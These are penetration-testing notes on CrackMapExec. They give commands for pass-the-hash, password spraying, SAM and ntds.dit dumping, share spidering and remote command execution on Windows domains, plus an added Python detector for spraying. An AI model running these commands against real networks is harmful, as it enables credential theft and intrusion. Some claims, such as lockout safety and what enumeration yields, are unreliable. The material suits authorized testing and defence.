CrackMapExec
Once we have access to a domain, CrackMapExec (CME) lets us sweep the network and see which users and machines we can access.
CME allows us to authenticate ourselves with the following protocols:
- smb
- ssh
- mssql
- ldap
- winrm
The most used protocol is smb as port 445 is commonly open.
CME offers a help menu for each protocol (e.g., crackmapexec winrm -h).
Installation
Basic usage
Main syntax
Main flags:
- -u <username>: the user whose credentials we will use to authenticate
- -p <password>: that user's password
- <target> (IP or FQDN): the host to enumerate (in our case, the Domain Controller)
- --users: enumerate domain users
- --groups: enumerate domain groups
- --loggedon-users: attempt to enumerate which users are logged on to the target, if any
Access the machine
# Check if we can access a machine
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN>
# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)
crackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>
Basic enumeration
# Enumerate active sessions
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --sessions
# Obtain the password policy
crackmapexec smb $ip -u <username> -p <password> --pass-pol
# Spraying password with crackmapexec
crackmapexec smb $ip/23 -u /folder/userlist.txt administrator -H 88ad09182de639ccc6579eb0849751cf --local-auth --continue-on-success | grep +
# --continue-on-success: keep spraying even after a valid credential is found. Useful when spraying a single password against a large user list
# --local-auth: if we are targeting a non-domain-joined computer, we need to use --local-auth. This flag tells the tool to attempt to log in only once on each machine, which removes any risk of account lockout
# -H: NTLM hash (-u accepts several values, so the user list file and a single account can be given together)
# Dump the SAM: extract the hashes of the users on the machine
crackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --sam
# Get the ntds.dit, given that your user has permissions
crackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --ntds
# Check which machines we can access in a subnet
crackmapexec smb $ip/24 -u <username> -p <password> -d <DOMAIN>
# Enumerate logged-on users on other hosts of the domain
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --loggedon-users
# Enumerate users of the domain
sudo crackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --users
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --users
# Enumerate groups of the domain
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --groups
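The spraying run above leaves a very distinctive footprint on the target side: one source address failing authentication against many different accounts in a short window, and (because of --continue-on-success) still failing after one account succeeds. As an added defensive example that is not part of the original notes, here is a small Python detector run over constructed logon records; the record format and the thresholds are assumptions, not a CME or Windows format.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real telemetry): time, source IP, account, outcome.
# The shape loosely mirrors what a 4625/4624 logon event pair provides.
SAMPLE_LOGS = """\
2024-11-17T10:00:01 10.10.10.5 alice FAIL
2024-11-17T10:00:02 10.10.10.5 bob FAIL
2024-11-17T10:00:02 10.10.10.5 carol FAIL
2024-11-17T10:00:03 10.10.10.5 dave FAIL
2024-11-17T10:00:03 10.10.10.5 erin FAIL
2024-11-17T10:00:04 10.10.10.5 administrator SUCCESS
2024-11-17T10:00:05 10.10.10.5 frank FAIL
2024-11-17T10:05:00 10.10.10.9 alice FAIL
2024-11-17T10:05:30 10.10.10.9 alice FAIL
2024-11-17T10:06:00 10.10.10.9 alice SUCCESS
"""

def parse_logs(text):
    """Turn the constructed text records into (timestamp, source, account, outcome) tuples."""
    events = []
    for line in text.splitlines():
        ts, src, user, outcome = line.split()
        events.append((datetime.fromisoformat(ts), src, user.lower(), outcome))
    return events

def detect_spray(events, min_accounts=5, window=timedelta(minutes=5)):
    """Return {source: {"accounts": [...], "successes": [...]}} for every source that
    failed logons against at least `min_accounts` distinct accounts inside `window`.
    Many failures against ONE account (10.10.10.9 above) is not a spray and is ignored."""
    by_src = defaultdict(list)
    for ts, src, user, outcome in events:
        by_src[src].append((ts, user, outcome))
    findings = {}
    for src, evs in by_src.items():
        evs.sort()
        fails = [(ts, u) for ts, u, o in evs if o == "FAIL"]
        start = 0
        for end in range(len(fails)):
            # Slide the window forward so it spans at most `window` of failures.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) >= min_accounts:
                hits = sorted(u for _, u, o in evs if o == "SUCCESS")
                findings[src] = {"accounts": sorted(users), "successes": hits}
                break
    return findings
```

A success from a source that has already been flagged is the account the spray most likely hit and is the first one to rotate.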
Enumerate shares
# See shares
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --shares
# The module spider_plus will dig through each readable share on the host and list all readable files.
sudo crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> -M spider_plus --share 'NameOfShare'
# CME writes the results to a JSON file located at /tmp/cme_spider_plus/<ip of host>
RCE with crackmapexec
# If --exec-method is not set, CrackMapExec tries the atexec method first; if that fails, specify --exec-method smbexec
crackmapexec smb $ip -u Administrator -p '<password>' -x 'whoami' --exec-method smbexec
Basic technique
Once we have access to a domain:
- Enumerate users and machines from our machine: we will have all registered users and their hashes.
- See whether any user is present on another machine of the domain, and check whether they have admin access there.
- The goal is to dump ntds.dit.
With the krbtgt and DC$ accounts you can get a golden ticket, and with DC$ a silver ticket.
What is a SAM hash like?
Take the Administrator one:
Basically, it has four colon-separated parts:
user:id:LM-hash:NTLM-hash
To use the hash with CrackMapExec (-H), we take the NTLM part.
Last update: 2024-11-17 Created: July 13, 2023 15:55:29